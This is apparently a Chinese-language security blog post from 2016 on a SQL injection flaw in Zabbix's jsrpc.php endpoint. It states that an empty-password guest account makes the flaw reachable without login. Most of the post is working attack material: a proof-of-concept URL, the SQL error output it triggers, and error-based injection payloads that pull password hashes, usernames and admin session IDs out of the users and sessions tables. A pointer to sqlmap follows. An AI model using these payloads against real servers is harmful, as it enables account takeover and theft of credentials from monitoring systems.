MENU

Zabbix Jsrpc Injection Vulnerability

August 17, 2016 • Security

Vulnerable Version(s): 2.2.x, 3.0.0-3.0.3(其他版本未经测试)

注入的前提是需要登陆的。 不需要登陆是因为zabbix开启了guest权限,而guest账号默认密码是空的...

POC:

/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&tim
estamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=hi
story.php&profileIdx=web.item.graph&profileIdx2=2'3297&updateProfil
e=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=
17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&
mark_color=1

输出结果,出现如下内容(包含:You have an error in your SQL syntax;)表示漏洞存在:

<div class="flickerfreescreen" data-timestamp="1471054088083" id="flickerfreescreen_1"><table class="list-table" 
id="t57ae81946b8cb"><thead><tr><th class="cell-width">Timestamp</th><th>Value</th></tr></thead><tbody><tr 
class="nothing-to-show"><td colspan="2">No data found.</td></tr></tbody></table></div><div class="msg-bad"><div 
class="msg-details"><ul><li>Error in query [INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES 
(39, 1, 'web.item.graph.period', '3600', 2, 2'3297)] [You have an error in your SQL syntax; check the manual that 
corresponds to your MySQL server version for the right syntax to use near ''3297)' at line 1]</li><li>Error in query 
[INSERT INTO profiles (profileid, userid, idx, value_str, type, idx2) VALUES (40, 1, 'web.item.graph.stime', 
'20160813041028', 3, 2'3297)] [You have an error in your SQL syntax; check the manual that corresponds to your MySQL 
server version for the right syntax to use near ''3297)' at line 1]</li><li>Error in query [INSERT INTO profiles 
(profileid, userid, idx, value_int, type, idx2) VALUES (41, 1, 'web.item.graph.isnow', '1', 2, 2'3297)] [You have an 
error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use 
near ''3297)' at line 1]</li></ul></div><span class="overlay-close-btn" onclick="javascript: 
$(this).closest('.msg-bad').remove();" title="Close"></span></div>

20160818121521.png

读密码:

/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1 or (select 1 from (select count(*),concat((select (select concat(passwd)) from zabbix.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or 1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17

用户名密码:

http://192.168.1.13/zabbix/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select (1) from users where 1=1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (select concat(alias,0x7e,passwd,0x7e) from users limit 1)),1,62)))a from information_schema.tables group by a)b))&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17

hash值取中间16位or直接爆sessionid:

http://192.168.1.13/zabbix/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select (1) from users where 1=1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (select concat(sessionid,0x7e,userid,0x7e,status) from sessions where status=0 and userid=1 LIMIT 0,1)),1,62)))a from information_schema.tables group by a)b))&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17

sqlmap即可:

411695564034760905.jpg

Tags: zabbix
Archives QR Code
QR Code for this page
Tipping QR Code